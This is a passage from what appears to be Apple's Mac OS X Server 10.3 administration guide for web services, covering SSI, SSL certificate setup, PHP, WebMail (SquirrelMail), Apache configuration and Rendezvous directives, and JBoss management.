application. To enable SSI, you must be comfortable with typing UNIX commands and
using a UNIX text editor.
To enable SSI:
1 In the Terminal application, use the sudo command with a text editor to edit the site
configuration files in /etc/httpd/sites/ as the super user (root).
2 Add the following line to each virtual host for which you want SSI enabled:
Options Includes
Each site is in a separate file in /etc/httpd/sites/.
To enable SSI for all virtual hosts, add the line outside any virtual host block.
3 In Server Admin for the server you want, click Settings in the button bar.
4 In the Sites pane, double-click one of the virtual host sites.
5 In the General pane, add index.shtml to the set of default index files for that site.
Repeat this procedure for each virtual host site that uses SSI. (See “Setting the Default
Page for a Website” on page 25 for more information.)
By default, the /etc/httpd/httpd.conf file maintained by Server Admin contains the
following two lines:
AddHandler server-parsed shtml
AddType text/html shtml
You can add MIME types in Server Admin from the MIME Types pane.
The changes take effect when you restart web service.
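For reference, once SSI is enabled, a page with the .shtml suffix can pull in shared content using a standard Apache include directive. A minimal sketch (the included path is a placeholder):
<!--#include virtual="/includes/header.html" -->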
Viewing Website Settings
You can use the Sites pane of Server Admin to see a list of your websites. The Sites
pane shows:
• Whether a site is enabled
• The site’s DNS name and IP address
• The port being used for the site
Double-clicking a site in the Sites pane opens the site details window, where you can
view or change the settings for the site.
Setting Server Responses to MIME Types and Content Handlers
Multipurpose Internet Mail Extension (MIME) is an Internet standard for specifying what
happens when a web browser requests a file with certain characteristics. Content
handlers are similar and also use suffixes to determine how a file is handled. A file’s
suffix describes the type of data in the file. Each suffix and its associated response
together is called a MIME type mapping or a content handler mapping. See
“Understanding Multipurpose Internet Mail Extension” on page 11 for more
information.
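Behind the scenes, these mappings correspond to standard Apache directives in the configuration files. A sketch with example values (not taken from your server's actual configuration):
AddType application/pdf pdf
AddHandler cgi-script cgi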
To set the server response for a MIME type or content handler:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the MIME Types or Content Handlers pane, click the Add button, or select the item in
the list you want to edit and click the Edit button.
4 If necessary, type a name for a new MIME type or content handler, then type the file
suffix associated with this mapping in the Suffixes field.
If you use the suffix cgi, make sure you’ve enabled CGI execution for the website.
5 Click Save.
Web service restarts.
Enabling SSL
Before you can enable Secure Sockets Layer (SSL) protection for a website, you have to
obtain the proper certificates. For more information, see “Secure Sockets Layer (SSL)”
on page 45. When you have obtained a certificate, you can set up SSL for a site.
To set up SSL for a website:
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site in the list.
4 In the Security pane, select Enable Secure Sockets Layer.
5 Type a password in the Pass Phrase field.
6 Type the location of the SSL log file in the SSL Log File field.
You can also click the Browse button to locate the folder you want to use.
If you are administering a remote server, file service must be running on the remote
server to use the Browse button.
7 Type the location of each certificate file in the appropriate field (if necessary), or use
the Browse button to choose the location.
8 Click the Edit button for the Certificate File, Key File, and CA File fields and paste the
contents of the appropriate certificate or key in the text field for each. Click OK each
time you paste text.
9 Click Save.
10 Click Stop Service, wait a moment, and then click Start Service.
Setting Up the SSL Log for a Website
If you are using Secure Sockets Layer (SSL) on your web server, you can set up a file to
log SSL transactions and errors.
To set up an SSL log:
1 In Server Admin, click Web for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site you want to edit.
4 In the Security pane, make sure Enable Secure Sockets Layer is checked, then enter the
pathname for the folder where you want to keep the SSL log in the SSL Log File field.
You can also use the Browse button to navigate to the folder.
5 Click Save.
Web service restarts.
Enabling PHP
PHP (PHP: Hypertext Preprocessor) is a scripting language embedded in HTML that is
used to create dynamic webpages. PHP provides functions similar to those of CGI
scripts, but supports a variety of database formats and can communicate across
networks via many different protocols. The PHP libraries are included in
Mac OS X Server, but are disabled by default.
See “Installing and Viewing Web Modules” on page 61 for more information on PHP.
To enable PHP:
1 In Server Admin, click Web for the server you want.
2 Click Settings in the button bar.
3 In the Modules pane, scroll to php4_module in the module list and click Enabled for
the module, if necessary.
4 Click Save.
Web service restarts.
User Content on Websites
Mac OS X client has a Personal Web Sharing feature, where a user may place content in
the Sites folder of his or her home directory and have it visible on the web. Mac OS X
Server has much broader web service capability, which can include a form of personal
web sharing, but there are important differences between Mac OS X client and
Mac OS X Server.
Web Service Configuration
By default, on Mac OS X Server:
• Web service ignores any files in the /etc/httpd/users/ folder.
• Workgroup Manager does not make any web service configuration changes.
• Folder listings are not enabled for users.
All folder listings in web service use Apache's FancyIndexing directive, which makes
folder listings more readable. In Server Admin, the Sites/Options pane for each site has
a Folder Listing checkbox. This setting enables folder listings for a specific virtual host
by adding a “+Indexes” flag to Apache's Options directive for that virtual host. If folder
listings are not explicitly enabled for each site (virtual host), file indexes are not shown.
The site-specific settings do not apply outside the site; therefore site-specific settings
do not apply to users' home directories. If you want users to have folder-indexing
capability on their home directories, you need to add suitable directives to Apache's
configuration files. For a specific user, you add the following directives inside the
<IfModule mod_userdir.c> block in the httpd.conf file:
<Directory "/Users/refuser/Sites">
Options Indexes MultiViews
AllowOverride None
Order allow,deny
Allow from all
</Directory>
Default Content
The default content for the user's Sites folder is an index.html file along with a few
images. It is important to note that this index.html file has text that describes the
Personal Web Sharing feature of Mac OS X client. The user should replace that
index.html file with one suited to the content of his or her Sites folder.
Accessing Web Content
Once the home directory is created, the content of the Sites folder within the user's
home directory is visible whenever web service is running. If your server is named
example.com and the user's short name is refuser, the content of the Sites folder can
be accessed at the URL http://example.com/~refuser.
If the user has multiple short names, any of those can also be used after the tilde to
access that same content.
If the user has placed a content file named foo.html in his or her Sites folder, that file
should be available at http://example.com/~refuser/foo.html.
If the user has placed multiple content files in his or her Sites folder, and cannot modify
the index.html to include links to those files, the user may benefit from the automatic
folder indexing described previously. If the “Enable folder listing” setting is enabled, an
index listing of file names will be visible to browsers at http://example.com/~refuser.
Indexing settings also apply to subfolders placed in the user's Sites folder. If the user
adds a content subfolder named Example to the Sites folder, and either an index.html
file is present inside the Example folder, or folder indexing is enabled for that user's site,
then the folder will be available to browsers at http://example.com/~refuser/Example.
The Module mod_hfs_apple Protects Web Content Against Case Insensitivity in the HFS File System
Mac OS X Server 10.3 has a new feature that provides case-sensitive coverage for HFS
file names. This new feature should mean that the extra protection of mod_hfs_apple
(discussed below) is not necessary.
The HFS Extended volume format commonly used for Mac OS X Server preserves the
case of file names but does not distinguish between a file or folder named “Example”
and one named “eXaMpLe.” Were it not for mod_hfs_apple, this would be a potential
issue when your web content resides on such a volume and you are attempting to
restrict access to all or part of your web content using security realms. If you set up a
security realm requiring browsers to use a name and a password for read-only access to
content within a folder named “Protected,” browsers would need to authenticate in
order to access the following URLs:
http://example.com/Protected
http://example.com/Protected/secret
http://example.com/Protected/sECreT
But they could bypass it by using something like the following:
http://example.com/PrOtECted
http://example.com/PrOtECted/secret
http://example.com/PrOtECted/sECreT
Fortunately, mod_hfs_apple prevents those types of efforts to bypass the security
realm, and this module is enabled by default.
Note: mod_hfs_apple operates on folders; it is NOT intended to prevent access to
individual files. A file named “secret” can be accessed as “seCREt”. This is correct
behavior, and does not allow bypassing security realms.
Because of the warning message that appears in the web service error log about
mod_hfs_apple, there have been questions about the function of mod_hfs_apple. The
warning messages do not indicate a problem with the correct function of
mod_hfs_apple.
You can verify that mod_hfs_apple is operating correctly by creating a security realm
and attempting to bypass it with a case-variant of the actual URL. You will be denied
access and your attempt will be logged in the web service error log with messages
similar to the following:
[Wed Jul 31 10:29:16 2002] [error] [client 17.221.41.31] Mis-cased URI: /Library/WebServer/
Documents/PrOTecTED/secret, wants: /Library/WebServer/Documents/Protected/
4 WebMail
Enable WebMail for the websites on your server to
provide access to basic email operations by means of a
web connection.
WebMail adds basic email functions to your website. If your web service hosts more
than one website, WebMail can provide access to mail service on any or all of the sites.
The mail service looks the same on all sites.
WebMail Basics
The WebMail software is included in Mac OS X Server, but is disabled by default.
The WebMail software is based on SquirrelMail (version 1.4.1), which is a collection of
open-source scripts run by the Apache server. For more information on SquirrelMail,
see the website www.squirrelmail.org.
WebMail Users
If you enable WebMail, a web browser user can:
• Compose messages and send them
• Receive messages
• Forward or reply to received messages
• Maintain a signature that is automatically appended to each sent message
• Create, delete, and rename folders and move messages between folders
• Attach files to outgoing messages
• Retrieve attached files from incoming messages
• Manage a private address book
• Set WebMail Preferences, including the color scheme displayed in the web browser
To use your WebMail service, a user must have an account on your mail server.
Therefore, you must have a mail server set up if you want to offer WebMail on your
websites.
Users access your website’s WebMail page by appending /WebMail to the URL of your
site. For example, http://mysite.example.com/WebMail/.
Users log in to WebMail with the name and password they use for logging in to regular
mail service. WebMail does not provide its own authentication. For more information
on mail service users, see the mail service administration guide.
When users log in to WebMail, their passwords are sent over the Internet in clear text
(not encrypted) unless the website is configured to use SSL. For instructions on
configuring SSL, see “Enabling SSL” on page 35.
WebMail users can consult the user manual for SquirrelMail at www.squirrelmail.org/
wiki/UserManual.
WebMail and Your Mail Server
WebMail relies on your mail server to provide the actual mail service. WebMail merely
provides access to the mail service through a web browser. WebMail cannot provide
mail service independent of a mail server.
WebMail uses the mail service of your Mac OS X Server by default. You can designate a
different mail server if you are comfortable using the Terminal application and UNIX
command-line tools. For instructions, see “Configuring WebMail” on page 43.
WebMail Protocols
WebMail uses standard email protocols and requires your mail server to support them.
These protocols are:
• Internet Message Access Protocol (IMAP) for retrieving incoming mail
• Simple Mail Transfer Protocol (SMTP) for exchanging mail with other mail servers
(sending outgoing mail and receiving incoming mail)
WebMail does not support retrieving incoming mail via Post Office Protocol (POP). Even
if your mail server supports POP, WebMail does not.
Enabling WebMail
You can enable WebMail for the website (or sites) hosted by your web server. Changes
take effect when you restart web service.
To enable WebMail for a site:
1 Make sure your mail service is started and configured to provide IMAP and SMTP
service.
2 Make sure IMAP mail service is enabled in the user accounts of the users you want to
have WebMail access.
For details on mail settings in user accounts, see the user management guide.
3 In Server Admin, click Web in the list for the server you want.
4 Click Settings in the button bar.
5 In the Sites pane, double-click the site in the list.
6 In the Options pane, select WebMail.
7 Click Save.
Web service restarts.
Configuring WebMail
After enabling WebMail to provide basic email functions on your website, you can
change some settings to integrate WebMail with your site. You can do this by editing
the configuration file /etc/squirrelmail/config/config.php or by using the Terminal
application to run an interactive configuration script with root privileges. Either way,
you actually change the settings of SquirrelMail, which is open-source software that
provides WebMail service for the Apache web server of Mac OS X Server.
SquirrelMail, hence WebMail, has several options that you can configure to integrate
WebMail with your site. The options and their default settings are as follows:
• Organization Name is displayed on the main WebMail page when a user logs in. The
default is Mac OS X Server WebMail.
• Organization Logo specifies the relative or absolute path to an image file.
• Organization Title is displayed as the title of the web browser window while viewing
a WebMail page. The default is Mac OS X Server WebMail.
• Trash Folder is the name of the IMAP folder where mail service puts messages when
the user deletes them. The default is Deleted Messages.
• Sent Folder is the name of the IMAP folder where mail service puts messages after
sending them. The default is Sent Messages.
• Draft Folder is the name of the IMAP folder where mail service puts the user’s draft
messages. The default is Drafts.
You can configure these and other settings—such as which mail server provides mail
service for WebMail—by running an interactive Perl script in a Terminal window, with
root privileges. The script operates by reading original values from the config.php file
and writing new values back to config.php.
Important: If you use the interactive configuration script to change any SquirrelMail
settings, you must also use the script to enter your server’s domain name. If you fail to
do this, WebMail will be unable to send messages.
The WebMail configuration settings apply to all websites hosted by your web service.
To configure basic WebMail options:
1 In the Terminal application, type the following command and press Return:
sudo /etc/squirrelmail/config/conf.pl
2 Follow the instructions displayed in the Terminal window to change SquirrelMail
settings as desired.
3 Change the domain name to your server’s real domain name, such as example.com.
The domain name is the first item on the SquirrelMail script’s Server Settings menu.
The script operates by reading original values from config.php and writing new values
back to config.php.
If you don’t enter the server’s actual domain name correctly, the interactive script
replaces the original value, getenv(SERVER_NAME), with the same value but enclosed
in single quotes. The quoted value no longer works as a function call to retrieve the
domain name, and as a result WebMail can’t send messages.
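To illustrate, here is roughly what that line in config.php looks like in each state (example values; the exact file contents on your server may differ):
$domain = getenv(SERVER_NAME); // original: resolved at runtime
$domain = 'getenv(SERVER_NAME)'; // broken: the quotes make it a literal string
$domain = 'example.com'; // correct: your server's real domain name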
WebMail configuration changes do not require restarting web service unless users are
logged in to WebMail.
To further customize the appearance (for example, to provide a specific appearance for
each of your websites), you need to know how to write PHP scripts. In addition, you
need to become familiar with the SquirrelMail plug-in architecture and write your own
SquirrelMail plug-ins.
5 Secure Sockets Layer (SSL)
Use Secure Sockets Layer to provide secure transactions
and encrypted communication to users of the websites
on your server.
If you want to provide secure transactions on your server, such as allowing users to
purchase items from a website, you should set up Secure Sockets Layer (SSL)
protection. SSL lets you send encrypted, authenticated information across the Internet.
If you want to allow credit card transactions through a website, for example, you can
protect the information that’s passed to and from that site.
Setting Up SSL
After you generate a certificate signing request (CSR) and send it to a certificate
authority, the authority sends you a certificate that you install on your server. They may also send you a CA certificate
(ca.crt). Installing this file is optional. Normally, CA certificates reside in client
applications such as Internet Explorer and allow those applications to verify that the
server certificate originated from the right authority. However, CA certificates expire or
evolve, so some client applications may not be up to date.
Generating a Certificate Signing Request (CSR) for Your Server
The CSR is a file that provides information needed to set up your server certificate.
To generate a CSR for your server:
1 Log in to your server using the root password and open the Terminal application.
2 At the prompt, type these commands and press Return at the end of each one:
cd
dd if=/dev/random of=rand.dat bs=1m count=1
openssl genrsa -rand rand.dat -des 1024 > key.pem
3 At the next prompt, type a passphrase, then press Return.
The passphrase you create unlocks the server’s certificate key. You will use this
passphrase when you enable SSL on your web server.
4 If it doesn’t already exist on your server, create a directory at the location /etc/httpd/
ssl.key.
Make a copy of the key.pem file (created in step 2) and rename it server.key. Then copy
server.key to the ssl.key directory. (A command sketch follows this procedure.)
5 At the prompt, type the following command and press Return:
openssl req -new -key key.pem -out csr.pem
This generates a file named csr.pem in your home directory.
6 When prompted, enter the following information:
• Country: The country in which your organization is located.
• State: The full name of your state.
• Locality: The city in which your organization is located.
• Organizational name: The organization to which your domain name is registered.
• Organizational unit: Usually something similar to a department name.
• Common name of your web server: The DNS name, such as server.apple.com.
• Email address: The email address to which you want the certificate sent.
The file csr.pem is generated from the information you provided.
7 At the prompt, type the following, then press Return:
cat csr.pem
The cat command lists the contents of the file you created in step 5 (csr.pem). You
should see the phrase “Begin Certificate Request” followed by a cryptic message. The
message ends with the phrase “End Certificate Request.” This is your certificate signing
request (CSR).
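As a sketch, the directory setup in step 4 amounts to these Terminal commands (assuming you are in your home directory):
sudo mkdir -p /etc/httpd/ssl.key
cp key.pem server.key
sudo cp server.key /etc/httpd/ssl.key/
If you want to double-check the request before sending it to a certificate authority, openssl can also decode it for you (a convenience, not a required step):
openssl req -noout -text -in csr.pem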
Obtaining a Website Certificate
You must purchase a certificate for each website from an issuing authority.
Keep these important points in mind when purchasing your certificate:
• You must provide an InterNIC-registered domain name that’s registered to your
organization.
• If you are prompted to choose a software vendor, choose Apache Freeware with
SSLeay.
• You have already generated a CSR, so when prompted, open your CSR file using a
text editor. Then copy and paste the contents of the CSR file into the appropriate text
field on the issuing authority’s website.
• You can have an SSL certificate for each IP address on your server. Because
certificates are expensive and must be renewed each year, you may want to purchase
a certificate for one host name and use the URL with host name followed by domain
name to avoid having to purchase multiple certificates. For example, if your domain
name is mywidgets.com, you could purchase a certificate for the host name “buy”
and your customers would connect to the URL https://buy.mywidgets.com.
• The default certificate format for SSLeay/OpenSSL is PEM, which is actually Base64-
encoded DER with header and footer lines. For more about the certificate format, see
www.modssl.org.
After you’ve completed the process, you’ll receive an email message that contains a
Secure Server ID. This is your server certificate. When you receive the certificate, save it
to your web server’s hard disk as a file named server.crt.
Important: Be sure to make a copy of the certificate message or file.
Installing the Certificate on Your Server
You can use Server Admin or the command-line tool to specify the certificates for a site.
For instructions on using Server Admin for this purpose, see “Enabling SSL” on page 35.
To install an SSL certificate using the command-line tool in the Terminal
application:
1 Log in to your server as the administrator or super user (also known as root).
2 If it doesn’t already exist on your server, create a directory with this name:
/etc/httpd/ssl.crt
3 Copy server.crt (the file that contains your Secure Server ID) to the ssl.crt directory.
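As a sketch, steps 2 and 3 amount to the following Terminal commands (assuming server.crt is in the current directory):
sudo mkdir -p /etc/httpd/ssl.crt
sudo cp server.crt /etc/httpd/ssl.crt/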
Enabling SSL for the Site
1 In Server Admin, click Web in the list for the server you want.
2 Click Settings in the button bar.
3 In the Sites pane, double-click the site where you plan to use the certificate.
4 In the Security pane, select Enable Secure Sockets Layer.
5 Type the passphrase you created when generating your certificate key in the Pass
Phrase field.
6 Set the location of the log file that will record SSL transactions.
7 Click the Edit button and paste the text from your certificate file (the certificate you
obtained from the issuing authority) in the Certificate File field.
8 Click the Edit button and paste the text from your key file (the file key.pem, which you
set up earlier) in the Key File field.
9 Click the Edit button and paste the text from the ca.crt file in the CA File field. (This is
an optional file that you may have received from the certificate authority.)
10 Click Save.
11 Stop and then start web service.
Web Server SSL Password Not Accepted When Manually Entered
Server Admin allows you to enable SSL with or without saving the SSL password. If you
did not save the passphrase with the SSL certificate data, the server prompts you for
the passphrase upon restart, but won't accept manually entered passphrases. Use the
Security pane for the site in Server Admin to save the passphrase with the SSL
certificate data.
6 Working With Open-Source Applications
Become familiar with the open-source applications
Mac OS X Server uses to administer and deliver web
services.
Several open-source applications provide essential features of web service. These
applications include:
• Apache web server
• JBoss application server
• Tomcat servlet container
• MySQL database
Apache
Apache is the HTTP web server provided with Mac OS X Server. You can use the Server
Admin application to manage most server operations, but in some instances you may
want to add or change parts of the open-source Apache server. In such situations, you
need to modify Apache configuration files and change or add modules.
Location of Essential Apache Files
Apache configuration files and locations have been simplified in Mac OS X Server 10.3.
Locations of key files are as follows:
• The Apache configuration file for web service is located in the directory /etc/httpd/.
• The site configuration files are located in the directory /etc/httpd/sites.
• The Apache error log, which is very useful for diagnosing problems with the
configuration file, is located in the directory /var/log/httpd/ (with a symlink that
allows the directory to be viewed as /Library/Logs/WebServer/).
• Temporarily disabled virtual hosts are in the directory /etc/httpd/sites_disabled/.
Note: All files in /etc/httpd/sites/ are read and processed by Apache when it does a
hard or soft (graceful) restart. Each time you save changes, the server does a graceful
restart. If you edit a file using a text editor that creates a temporary or backup copy,
the server restart may fail because two files with almost identical names are present.
To avoid this problem, delete temporary or backup files created by editing files in this
folder.
Editing Apache Configuration Files
You can edit Apache configuration files if you need to work with features of the Apache
web server that aren't included in Server Admin. To edit configuration files, you should
be an experienced Apache administrator and familiar with text-editing tools. Be sure to
make a copy of the original configuration file before editing it.
The configuration file httpd.conf handles all directives controlled by the Server Admin
application. You can edit this file, as long as you follow the conventions already in place
there (as well as the comments in that file). This file also has a directive to include the
sites/ directory. In that directory are all of the virtual hosts for that server. The files are
named with the unique identifier of the virtual host (for example,
10.201.42.7410_80_17.221.43.127_www.example.com.conf). You disable specific sites by
moving them to the sites_disabled directory and then restarting web service. You can
also edit site files as long as the conventions in the file are followed.
One hidden file in the sites_disabled folder is named “default_default.conf.” This file is
used as the template for all new virtual hosts created in Server Admin. An administrator
can edit the template file to customize it, taking care to follow the conventions already
established in the file.
For more information about Apache and its modules, see “Apache Modules” on
page 61.
Starting and Stopping Web Service Using the apachectl Script
The default way to start and stop Apache on Mac OS X Server is to use the web module
of Server Admin.
If you want to use the apachectl script to start and stop web service instead of using
Server Admin, be aware of the following behaviors:
• The web performance cache is enabled by default. When web service starts, both the
main web service process (httpd) and a webperfcache process start. (The
webperfcache process serves static content from a memory cache and relays
requests to httpd when necessary.) The apachectl script that comes with Mac OS X
Server is unaware of webperfcache. So if you have not disabled the performance
cache, you also need to use the webperfcachectl script to start and stop
webperfcache.
• The apachectl script does not increase the soft process limit beyond the default of
100. Server Admin raises this limit when it starts Apache. If your web server receives a
lot of traffic and relies on CGI scripts, web service may fail to run when it reaches the
soft process limit.
• The apachectl script does not start Apache automatically when the server restarts.
Understanding apachectl and the Web Service Soft Process Limit
When Apache is started using the apachectl script, the soft process limit is 100, the
default limit.
When you use CGI scripts, this limit may not be high enough. In this case, you can start
web service using Server Admin, which sets the soft process limit to 2048. Alternatively,
you can type “ulimit -u 2048” before using apachectl.
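For example, a manual start that accounts for both the process limit and the performance cache might look like this (a sketch; webperfcachectl is needed only if the performance cache is enabled):
ulimit -u 2048
sudo apachectl start
sudo webperfcachectl start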
Enabling Apache Rendezvous Registration
Starting with version 10.2.4 of Mac OS X and Mac OS X Server, the preinstalled Apache
1.3 web service has the capability to register sites with Rendezvous. This feature, which
allows Rendezvous-enabled browsers such as Safari to find sites by name, is
implemented using a new Apache module, mod_rendezvous_apple. This module is
different from the mod_rendezvous available from a third party. (Apache Rendezvous is
not supported on the preinstalled Apache 2 web service.)
The module mod_rendezvous_apple allows administrators to control how websites are
registered with Rendezvous. Mod_rendezvous_apple is disabled by default on
Mac OS X Server.
To enable mod_rendezvous_apple on Mac OS X Server:
m To enable the module, use the Modules pane in Server Admin.
To set up mod_rendezvous_apple on Mac OS X Server:
m To cause additional logging, which may be helpful if you discover a problem, find the
LogLevel directive in httpd.conf and change it to a more verbose setting, such as “info.”
Note: Whenever new users are added, restart web service so that their sites are
registered.
As always, follow the guidelines Apple has added as comments in configuration files.
They explain safe procedures for modifying those files.
Note that a user's home directory, which would include a Sites folder, might not be
present if the administrator added the user without creating a home directory for that
person. There are several ways to create a home directory, such as adding the home
directory in the Workgroup Manager application or using the command-line
createhomedir tool to create the directory.
Here is a full description of the Apache configuration directives supported by
mod_rendezvous_apple.
RegisterDefaultSite directive
• Syntax: RegisterDefaultSite [port | main]
• Default: No registration if directive is absent. Port defaults to 80.
• Context: server config
• Compatibility: Apache 1.3.x; Mac OS X and Mac OS X Server only
• Module: mod_rendezvous_apple
This directive controls how the computer name is registered on the default site with
Rendezvous.
The RegisterDefaultSite directive causes the registration of the default website under
the computer name, as specified in the Sharing pane of System Preferences. A port
number can be specified, or the keyword “main”; in the latter case, the port number of
the “main server” (outside any virtual hosts) is used. On Mac OS X Server, do not specify
“main,” because all externally visible sites are virtual hosts, and the main server is used
only for status. If the argument is omitted, port 80 is used.
If the directive is absent, the computer name is not registered.
Rendezvous details: This directive results in a call to the registration function, with an
empty string as the name (causing Rendezvous to use the computer name), with
“_http._tcp” as the service type (indicating a web server), and with an empty string as
the TXT parameter (indicating the default website).
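For example, to register the default site explicitly on port 80 (equivalent to omitting the argument), the entry in httpd.conf would be:
RegisterDefaultSite 80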
RegisterUserSite directive
• Syntax: RegisterUserSite username | all-users | customized-users
[registrationNameFormat [port | main]]
• Default: No registration if directive is absent; registration name defaults to
longname. Port defaults to 80, host defaults to local.
• Context: server config
• Compatibility: Apache 1.3.x; Mac OS X and Mac OS X Server only
• Module: mod_rendezvous_apple
This RegisterUserSite directive causes the registration of the specified users’ default
website.
The required first argument is either an individual user's name or the keyword “all-
users” or “customized-users.” The “all-users” keyword causes all users in the host’s
directory to be considered for registration. Registration takes place if the user is a non-
system user (user ID > 100), with an enabled website directory as specified in the
UserDir directive, and only if that directory is accessible by the local host. Note that this
may require a mount if the user's home directory is remote; if the home directory is not
available, the user site is not registered. The “customized-users” keyword limits
registration to those users who have an index.html file in their website directory that
differs from the index.html file in the standard user template. In other words, it makes a
reasonable attempt to limit registration to users who have customized their websites.
The optional second argument determines the form of the name under which the user
site is registered. This takes the form of a format string, similar to the LogFormat
directive. Certain directives in the format string are replaced with values:
%l - user’s longname, such as Joe User
%n - user’s short name, such as juser
%u - user’s userid, such as 1234
%t - HTML title of user’s index file (as determined by DirectoryIndex directive; by
default it is index.html) from the user’s default site folder (as determined by the
UserDir directive; by default it is Sites). For Mac OS X Personal Web Sharing, the
default title in a non-customized webpage is “Mac OS X Personal Web Sharing.”
%c - computer name, as set in the Sharing pane of System Preferences
The default is %l, the longname. The second argument must be specified if the optional
third argument is desired.
The optional third argument can be used to specify a port number under which
the HTTP service is to be registered, or the keyword “main”; in the latter case, the port
number of the “main server” (outside any virtual hosts) is used. In the case of Mac OS X
Server, do not specify “main” for the port, because all externally visible sites are virtual
hosts, and the main server is used only for status. If the port argument is omitted, port
80 is used.
If the directive is absent, no user site registration takes place. This directive is not
processed if mod_userdir is not loaded. The UserDir and DirectoryIndex directives must
precede the RegisterUserSite directive in the Apache config file.
Rendezvous details: This directive results in a call to the registration function, with a
string like “Joe User” as the name, with “_http._tcp” as the service type (indicating a web
server), and with a value like “path=/~juser/” as the TXT parameter (which, after
expansion by mod_userdir, indicates the user’s default website), and with the
appropriate port.
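A sketch based on the syntax above, registering every customized user site under the user's long name followed by “'s Site,” on port 80:
RegisterUserSite customized-users "%l's Site" 80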
RegisterResource directive
• Syntax: RegisterResource name path [port | main]
• Default: No registration if directive is absent. Port defaults to 80.
• Context: server config
• Compatibility: Apache 1.3.x; Mac OS X and Mac OS X Server only
• Module: mod_rendezvous_apple
The RegisterResource directive causes the registration of the specified resource path
under the specified name.
The optional third argument can be used to specify a port number, or the keyword
“main”; in the latter case, the port number of the “main server” (outside any virtual
hosts) is used. On Mac OS X Server, do not specify “main,” because all externally visible
sites are virtual hosts, and the main server is used only for status. If the third argument
is omitted, port 80 is used.
Rendezvous details: This directive results in a call to the registration function, with the
specified name, with “_http._tcp” as the service type (indicating a web server), with
“path=/specifiedpath” as the TXT parameter, and with the appropriate port.
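For example, to advertise a resource path under a human-readable name (both values are placeholders):
RegisterResource "Staff Directory" /staff/ 80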
Using Apache Axis
You can use Apache Axis by writing web applications that use the Axis libraries and
then deploying the applications in Tomcat or JBoss. Unlike JBoss and Tomcat, Axis is not
usually used as an application server.
Mac OS X Server version 10.3 includes a preinstalled version of Apache Axis (1.1), which
operates in conjunction with the preinstalled Tomcat 4.1.24-LE. Apache Axis is an
implementation of Simple Object Access Protocol (SOAP). More about SOAP can be
found at http://www.w3.org/TR/SOAP/. More about Axis can be found at
http://ws.apache.org/axis/.
The Axis libraries can be found in /System/Library/Axis. By default, Apple installs a
sample Axis web application into Tomcat. The web application known as axis can be
found in /Library/Tomcat/webapps/axis.
After you enable Tomcat using the Application Server section of Server Admin, you can
validate the preinstalled Apache Axis by browsing the following:
http://example.com:9006/axis/
Replace “example.com” in the URL above with your host name. Note the nonstandard
Tomcat port.
The first time you exercise the preinstalled Axis by browsing http://example.com:9006/
axis/ and selecting the link entitled “Validate the local installation's configuration,” you
should expect to see the following error messages:
• Warning: could not find class javax.mail.internet.MimeMessage from file mail.jar
Attachments will not work.
See http://java.sun.com/products/javamail/
• Warning: could not find class org.apache.xml.security.Init from file xmlsec.jar
XML Security is not supported
See http://xml.apache.org/security/
Follow the instructions that accompany the warning messages if you require those
optional components.
Consult the Axis User's Guide on the Apache Axis website to learn more about using
Axis in your own web applications.
Experimenting With Apache 2
Version 10.3 of Mac OS X Server includes Apache 2 for evaluation purposes in addition
to the operational version of Apache 1.3. By default, Apache 2 is disabled, and all Server
Admin operations work correctly with Apache 1.
If you want to experiment with Apache 2, note the following:
• It is installed in a separate location in the file system: /opt/apache2.
• It is not connected to Server Admin.
• It serves webpages from /opt/apache2/htdocs.
• Its configuration is in /opt/apache2/conf/httpd.conf. Apple modified this file by
configuring it to run the httpd processes as user and group www. If you enable
WebDAV with Apache 2, note that although your WebDAV clients using version 10.1
of Mac OS X or Mac OS X Server will be able to mount Apache2 WebDAV volumes,
they will not have write access; they will have read-only access. WebDAV clients using
version 10.2 will not have this problem.
• It is controlled by its own version of the apachectl script, so to start it, type “sudo /
opt/apache2/bin/apachectl start.”
• Although it's possible to run both versions of Apache, you should be cautious when
doing so. Make sure the two versions do not attempt to listen on the same port. Both
are configured to listen on port 80, so either edit /opt/apache2/conf/httpd.conf to
change the Listen directive or use the web section of Server Admin to change the
port of all your virtual hosts to something other than 80. Also note that if the web
performance cache is enabled, it may be the process that's actually listening on
port 80.
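For instance, to move the evaluation copy of Apache 2 off port 80, you could edit /opt/apache2/conf/httpd.conf and change its Listen directive to an unused port (8080 is an arbitrary choice):
Listen 8080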
JBoss
JBoss is an open-source application server designed for J2EE applications; it runs on
Java 1.4.1. JBoss is a widely used, full-featured Java application server. It provides a full
Java 2 Platform, Enterprise Edition (J2EE) technology stack with features such as:
• An Enterprise Java Bean (EJB) container
• Java Management Extensions (JMX)
• Java Connector Architecture (JCA)
By default, JBoss uses Tomcat as its web container, but you can use other web
containers, such as Jetty, if you wish.
You can use the Application Server section of Server Admin and the command-line
tools in the Terminal application to manage JBoss. Server Admin integrates with the
watchdog process to ensure continuous availability of JBoss once JBoss has been
started. You can use Server Admin to start one of the available JBoss configurations,
stop JBoss, and view the log files.
Two web-based tools for working with JBoss are also included with Mac OS X Server,
one for management and configuration of the JBoss server and one for deployment of
existing applications. Both tools are located in /Library/JBoss/Application.
For detailed information about JBoss, J2EE, and the tools, see these guides:
• Java application server administration guide, which explains how to deploy and
manage J2EE applications using JBoss in Mac OS X Server
• Java enterprise applications guide, which explains how to develop J2EE applications
Both guides are available from Apple developer publications.
Additional information about these Java technologies is available online.
• For JBoss, see www.jboss.org/.
• For J2EE, see java.sun.com/j2ee/.
To open the JBoss management tool:
m In Server Admin, click Application Server in the list for the server you want.
To start or stop JBoss:
1 In Server Admin, click Application Server in the list for the server you want.
2 Click Settings in the button bar.
3 Select one of the JBoss options. (Do not select Tomcat Only.)
4 Click Start Service or Stop Service.
JBoss is preconfigured to use a local configuration.
With JBoss turned on, you can use the management tool to configure your server.
For details of configuring JBoss and using the command-line tools for it, see the Java
application server administration guide, which explains how to deploy and manage
J2EE applications using JBoss in Mac OS X Server. This guide is available from Apple
developer publications.
To change the JBoss configuration in use:
1 In Server Admin, click Application Server in the list for the server you want.
2 Click Settings in the button bar.
3 Do one of the following:
• Click Load Remote Configuration and type the location of a JBoss NetBoot server.
• Click Use Local Configuration and choose a configuration from the pop-up menu.
To manage JBoss:
1 In Server Admin, click Application Server.
2 Click Settings in the button bar.
3 Click Manage JBoss.
Note: The JBoss management tool must already be running. You can use the Terminal
application to set it as a startup item.
4 Make the adjustments you want in the management console.
Backing Up and Restoring JBoss Configurations
You use the Application Server section of Server Admin to back up and restore JBoss
configurations.
To back up or restore a JBoss configuration:
